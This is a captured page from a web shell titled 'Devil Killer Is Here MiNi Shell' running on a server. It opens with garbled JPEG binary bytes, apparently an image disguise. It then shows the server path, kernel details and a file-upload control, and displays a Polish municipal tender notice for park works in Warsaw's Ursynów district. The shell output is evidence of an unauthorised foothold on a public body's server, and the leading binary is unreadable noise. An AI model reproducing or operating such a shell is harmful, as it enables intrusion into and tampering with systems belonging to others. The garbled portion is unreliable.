JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240308/0023752101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie zagospodarowania terenu wschodniej części Parku Przy Bażantarni wraz z 24 miesięczną pielęgnacją roślin w okresie gwarancyjnym. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO STOŁECZNE WARSZAWA DZIELNICA URSYNÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 01525964000138</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Komisji Edukacji Narodowej 61</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-777</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urysnow.wzp@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ursynow.um.warszawa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie zagospodarowania terenu wschodniej części Parku Przy Bażantarni wraz z 24 miesięczną pielęgnacją roślin w okresie gwarancyjnym. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ddfccfe8-dd27-11ee-9fce-3adbe5eb3a3d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00237521</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00025270/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.52 Wykonanie zagospodarowania terenu wschodniej części Parku Przy Bażantarni wraz z 24 miesięczną pielęgnacją roślin w okresie gwarancyjnym</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.ursynow.um.warszawa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacja o środkach komunikacji<br/>elektronicznej, przy użyciu których Zamawiający będzie komunikował się z wykonawcami oraz informacje o wymaganiach<br/>technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej:<br/>1) Komunikacja w niniejszym postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie<br/>dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej za<br/>pośrednictwem Platformy zakupowej pod adresem https://zamowienia.um.warszawa.pl zwanej dalej Platformą lub Systemem.<br/>2) Przekazanie oferty wymaga od Wykonawcy zarejestrowania się i zalogowania na Platformie, zgodnie z poniższą kolejnością.<br/>3) Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub założenia bezpłatnego konta. Rejestracja Wykonawcy na Platformie<br/>następuje automatycznie poprzez weryfikację adresu e-mail podanego przez Wykonawcę w formularzu rejestracyjnym. W<br/>uzasadnionych przypadkach (np. wprowadzenie danych niezgodnych z danymi rejestrowymi) weryfikacja danych Wykonawcy może<br/>trwać maksymalnie do 2 dni roboczych. Mając to na uwadze, Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego<br/>na rejestrację w procesie złożenia Oferty w formie elektronicznej lub w postaci elektronicznej.<br/>4) Niezbędne wymagania sprzętowo- aplikacyjne, które musi spełniać komputer Wykonawcy:<br/>• Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s na komputer;<br/>• komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta;<br/>• Zainstalowana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google Chrome lub MS Edge;<br/>• Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf;<br/>5) Dopuszczalne wielkości i formaty przesyłanych danych<br/>• Wielkość pojedynczego pliku zamieszczanego w systemie nieprzekraczająca 100 MB;<br/>• Dopuszczalne formaty plików: txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg,<br/>wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL,<br/>XMLsig, XAdES, CAdES, ASIC, XMLenc<br/>6) Kodowanie i czas odbioru danych<br/>• Plik załączony i zapisany przez Wykonawcę, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość<br/>otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert;<br/>• Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego<br/>serwera synchronizowanego odpowiednim źródłem czasu - zegarem Głównego Urzędu Miar.<br/>Pozostałe informacje dostępne w pkt. 3 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">KLAUZULA INFORMACYJNA O PRZETWARZANIU DANYCH OSOBOWYCH NA<br/>PODSTAWIE PRZEPISÓW PRAWA pkt 36 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">18/WZP/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zagospodarowanie terenu zieleni publicznej wschodniej części Parku Przy Bażantarni (dz. ew. nr 11, 13/3, 21/4, 2/4 obręb 1-11-09), którego celem jest rewaloryzacja terenów zielonych parku oraz wzbogacenie jego programu rekreacyjnego zachowując naturalny, leśny charakter obszaru. Zakres prac określa dokumentacja projektowa, stanowiąca załącznik nr 6a do SWZ, w związku z czym zamówienie przewiduje m.in.:<br/>•	przebudowę istniejącego układu komunikacyjnego – demontaż nawierzchni istniejącej alei z elementów betonowych oraz wykonanie nawierzchni mineralnej, wodoprzepuszczalnej,<br/>•	rozbiórka, wywiezienie i utylizacja zgodnie z przepisami hałd gruzu,<br/>•	budowę nawierzchni mineralnej, wodoprzepuszczalnej po istniejących szlakach przedeptów,<br/>•	budowę nawierzchni z elementów drewnianych typu deck,<br/>•	budowę strefy sportowo-rekreacyjnej – budowę parkour/flow parku,<br/>•	budowę strefy wybiegu dla psów,<br/>•	wymianę i ustawienie nowych elementów małej architektury,<br/>•	wykonanie prac pielęgnacyjnych związane z istniejącym drzewostanem,<br/>•	wykonanie nowych nasadzeń i aranżacji zieleni wraz z prowadzeniem prac pielęgnacyjnych w okresie gwarancji,<br/>•	budowę hydrantu ogrodowego do podlewania zieleni wraz z przyłączeniem do sieci wodociągowej,<br/>•	wymianę latarni parkowych,<br/>•	instalację czujników jakości powietrza z wyświetlaczem,<br/>•	wykonanie wszystkich czynności opisanych w Decyzji Regionalnego Dyrektora Ochrony Środowiska w Warszawie z dnia 18.08.2023 r. i z dnia 02.10.2023 r., a w tym:<br/>o	wykonanie wszystkich czynności związanych z ochroną gatunkową zwierząt określonych w Decyzji (takich jak montaż wygrodzeń herpetologicznych itp.),<br/>o	zapewnienie nadzoru specjalistów z dziedziny entomologii, malakologii, herpetologii, ornitologii, teriologii i chiropterologii, których koordynatorem będzie osoba wskazana w umowie jako koordynator ds. ochrony przyrody,<br/>o	prowadzenie dziennika obserwacji przez cały okres realizacji umowy,<br/>o	wykonania sprawozdania z wykorzystania z zezwolenia.<br/>UWAGA 1:<br/>	W § 3 ust. 1 projektowanych postanowień umowy stanowiących załącznik nr 3 do SWZ, zobowiązano Wykonawcę do osobistego wykonania przez Wykonawcę kluczowych części zamówienia obejmujących roboty budowlane związane z budową nawierzchni mineralnych zgodnie z art. 60 i 121 ustawy Prawo zamówień publicznych (Dz.U. z 2023 r., poz. 1605 ze zm.).<br/>	Zamawiający uznał za konieczne zastrzeżenie kluczowych części zamówienia polegających na budowie nawierzchni we wschodniej części Parku Przy Bażantarni w Warszawie. Projekt wskazuje na nietypową technologię wykonania nawierzchni ziemnych (mineralnych), które będą wykonane w formie nasypu, w sztucznie utworzonym korycie (typowo nawierzchnie wykonuje się w korycie gruntu rodzimego), uniemożliwiającym rozsuwanie się warstw nawierzchni i umożliwiającym spadkowe odprowadzanie wody. Przyjęta technologia nie jest powszechna ani powtarzalna – ze względu na trudne warunki terenowe (gęste zadrzewienie) należy wykonać nasyp celem nienaruszenia statyki drzew.<br/><br/>	Dzięki bezpośredniej odpowiedzialności Wykonawcy przed Zamawiającym zostanie zminimalizowane ryzyko prowadzące do wad w wykonaniu zamówienia ze względu na strategiczne znaczenie, charakter, kontrolę i przeznaczenie wykonanych robót budowlanych poprzez kontrolę Wykonawcy podczas postępowania o udzielenie zamówienia publicznego na skutek powiązania zastrzeżenia kluczowych części zamówienia z warunkami udziału w postępowaniu.<br/>	Wykonanie robót budowlanych współfinasowane jest z dotacji udzielonej przez Województwo Mazowieckie w ramach Instrumentu wsparcia zadań ważnych dla równomiernego rozwoju województwa mazowieckiego zgodnie z umową z dnia 25.08.2021 r. nr W/UMWM-UU/UM/RF/4540/2021.<br/>UWAGA 2:<br/>Z zakresu przedmiotowego zamówienia wyłączone zostają poniższe elementy zawarte w dokumentacji projektowej (załącznik do Opisu przedmiotu zamówienia - załącznik nr 6a do SWZ):<br/>	Budowa nawierzchni mineralnej - ścieżki pieszej – zakres wyłączony z realizacji opisuje załącznik nr 1 do OPZ (Etap 2),<br/>	Dostawa i montaż obiektów małej architektury – siedzisk z bali drewnianych zaprojektowanych przy wyłączonej z realizacji ścieżki pieszej z nawierzchni mineralnej (realizacja obejmuje budowę 8 siedzisk z bali drewnianych przy budowanej ścieżce z nawierzchni mineralnej) – zakres wyłączony z realizacji opisuje załącznik nr 1 do OPZ (Etap 2),<br/>	Wycinki kolizyjne 4 drzew w rejonie zaprojektowanego flow parku (wycinka będzie wykonana przez Zamawiającego w dacie obowiązywania Decyzji Marszałka Województwa Mazowieckiego nr 990/2023/PE-ZD-II z dnia 18.07.2023 r. i nr 1453/2023/PE-ZD-II z dnia 13.10.2023 r. oraz Decyzji Regionalnego Dyrektora Ochrony Środowiska w Warszawie nr WPN-I.6401.513.2023.MA z dnia 02.10.2023 r.)<br/>	użycie herbicydów,<br/>	użycie nawozów mineralnych przy nasadzeniach zieleni. <br/><br/>Szczegółowy zakres przedmiotu zamówienia oraz warunki jego realizacji określony został w opisie przedmiotu zamówienia oraz jego załącznikach, specyfikacjach technicznych, projektowanych postanowieniach umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111291-4 - Roboty w zakresie zagospodarowania terenu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45112711-2 - Roboty w zakresie kształtowania parków</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45220000-5 - Roboty inżynieryjne i budowlane</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <p class="mb-0">43325000-7 - Wyposażenie parków i placów zabaw</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-12-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający<br/>przewiduje możliwość udzielenia zamówień, o których mowa w art. 305 pkt 1 w związku z art. 214 pkt 7) ustawy Prawo zamówień<br/>publicznych, o łącznej wartości do 834 429,42 zł netto. Przewidywany zakres zamówienia podobnego:<br/>• Roboty budowlane związane z wykonaniem nawierzchni,<br/>• Dostawa i montaż małej architektury.<br/>Zamówienie zostanie udzielone pod warunkiem, że Zamawiający będzie posiadał niezbędne środki finansowe i będzie ono<br/>realizowane na zasadach umowy podstawowej.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W celu wyboru najkorzystniejszej oferty Zamawiający przyjął cenę jako jedyne kryterium oceny ofert.<br/>Kryterium(Pc) „cena brutto” – waga 100%<br/>Zasady oceny ofert według ustalonych kryteriów:<br/>Komisja przetargowa przyzna każdej ofercie niepodlegającej odrzuceniu, w kryterium „cena brutto” wg wzoru:<br/>najniższa cena ofertowa brutto<br/>1) Pc= --------------------------------------------------------------- x 100 pkt, przy czym 1 pkt = 1%,<br/>cena oferty badanej brutto<br/>2) Przyjmuje się, że 1% = 1 pkt i tak zostanie przeliczona liczba punktów dla każdej z ofert. Oferta w tym kryterium może uzyskać<br/>maksymalnie – 100 punktów.<br/>3) Za najkorzystniejszą zostanie uznana oferta, która uzyskała najwyższą liczbę punktów przyznaną przez Komisję wg wzoru<br/>określonego w pkt 30 ppkt 1) SWZ. Zamawiający zastosuje zaokrąglenie każdego wyniku do dwóch miejsc po przecinku.<br/>4) Maksymalna liczba punktów jaką może osiągnąć oferta wynosi 100 pkt = 100%.<br/>5) Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiada wszystkim wymaganiom przedstawionym w ustawie<br/>Prawo zamówień publicznych oraz wymaganiom przedstawionych w niniejszej Specyfikacji i została oceniona jako najkorzystniejsza<br/>na podstawie podanych kryteriów wyboru.<br/>6) Zamawiający powiadomi o wynikach postępowania wszystkich Wykonawców biorących udział w postępowaniu o udzielenie<br/>zamówienia.<br/>7) Wybranemu Wykonawcy, Zamawiający wskaże termin i miejsce podpisania umowy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie przedmiotowego zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące: <br/><br/>1) Zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie określa warunku udziału w postępowaniu.<br/>2) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie określa warunku udziału w postępowaniu.<br/>3) Sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie określa warunku udziału w postępowaniu.<br/>4) Zdolności technicznej lub zawodowej<br/>	Zamawiający wymaga, aby Wykonawca wykazał, że:<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał¹ (tj. zakończył): <br/>	co najmniej: jedną robotę budowlaną polegającą na budowie, i/lub przebudowie i/lub remoncie publicznego terenu zieleni , w którego zakres wchodziła budowa lub przebudowa lub remont nawierzchni mineralnych .<br/>oraz <br/>b) w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał¹ (tj. zakończył) lub wykonuje2 <br/>	co najmniej: jedną usługę/usługi świadczoną/e nieprzerwanie przez okres co najmniej 6 miesięcy dla jednego Zamawiającego, której zakres obejmował co najmniej pielęgnację drzew i/lub krzewów.<br/>UWAGA 1:<br/>¹ Za wykonaną robotę/usługę Zamawiający uzna taką robotę, której przedmiot został odebrany przez Zamawiającego jako wykonany w sposób należyty oraz w przypadku robót budowlanych zgodnie z zasadami sztuki budowlanej i prawidłowo ukończony.<br/>2 W przypadku, gdy Wykonawca wykaże się usługą, która jest w toku realizacji, Zamawiający uzna warunek za spełniony, jeżeli na dzień składania ofert okres świadczenia usługi będzie nie krótszy niż okres 6 miesięcy, a dowody o których mowa w pkt 17 ppkt 1) SWZ potwierdzą, że usługa wykonywana jest należycie przez okres nie krótszy niż 6 miesięcy.<br/>Dopuszcza się wykazanie realizacji prac w ramach więcej niż jednej umowy zawartej z jednym Zamawiającym, przy czym (łączny) okres obowiązywania umów wyniósł co najmniej 6 miesięcy i usługi były świadczone w ramach umów następujących bezpośrednio po sobie.<br/>c) dysponuje zespołem osobowym, składającym się z osób zdolnych do wykonania zamówienia, pełniących poniżej wskazane funkcje, a w szczególności:<br/>	w zakresie wykonania robót budowlanych, co najmniej jedną osobą (przy czym Zamawiający dopuszcza łączenie poniższych funkcji przez jedną osobę):<br/>c.1. wyznaczoną do sprawowania funkcji kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej lub odpowiednie wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie wydane obywatelom innych Państw, z zastrzeżeniem art.12a. ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. 2023 poz. 682);<br/>oraz<br/>c.2 wyznaczoną do sprawowania funkcji kierownika robót sanitarnych, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych, lub odpowiednie wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie wydane obywatelom innych Państw, z zastrzeżeniem art.12a. ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. 2023 poz. 682);<br/>oraz <br/>c.3. wyznaczoną do sprawowania funkcji kierownika robót elektrycznych, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i urządzeń elektroenergetycznych lub odpowiednie wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie wydane obywatelom innych Państw, z 